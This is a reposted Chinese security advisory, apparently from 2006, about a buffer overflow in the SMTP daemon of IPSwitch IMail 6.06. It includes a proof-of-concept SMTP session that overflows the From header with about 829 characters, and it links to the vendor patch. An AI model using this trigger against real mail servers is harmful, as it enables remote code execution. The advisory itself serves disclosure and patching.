IMail SMTP 缓冲区溢出漏洞 (APP,缺陷)

王朝other·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

IMail SMTP 缓冲区溢出漏洞 (APP,缺陷)

涉及程序:

SMTP daemon

描述:

IMail SMTP 服务器缓冲区溢出导致执行攻击者代码漏洞

详细:

IPSwitch IMail 是一个流行的电子邮件服务器,通过 web 接口为客户提供邮件服务。并且 IMail 与大多数常见的电子邮

件协议兼容,例如:SMTP, POP3, IMAP4, LDAP等。今天发现它存在缓冲区溢出漏洞。问题在于 IMail SMTP 守护进程在处

理输入数据时没有进行正确的边界检查。远程攻击者利用这点能使 IMailSMTP 服务器发生缓冲区溢出从而执行攻击者提

供的代码。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负

为了重写 EIP,必须知道有效的邮件列表名(附:读者可向 imailsrv@example.com 索取邮件列表名,内容写“list"即

可)。将邮件列表名放入下列 SMTP 请求中,将能成功导致 IMail 服务缓冲区溢出。

Client SMTP Session -> IMAIL SMTP

----------------------------------------------------

helo eeyerulez

mailfrom: <>

rcpt to: valid_mailing_list

data

From: [buffer] example.com

To: Whatever

wohooo!

.

quit

-----------------------------------------------------

Where [buffer] is 829 or so characters.

受影响系统:

IPSwitch's IMail 6.06 SMTP daemon

解决方案:

CNNS 建议您立即下载安装补丁:

[ul]http://ipswitch.com/support/IMail/patch-upgrades.html [/ul]

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航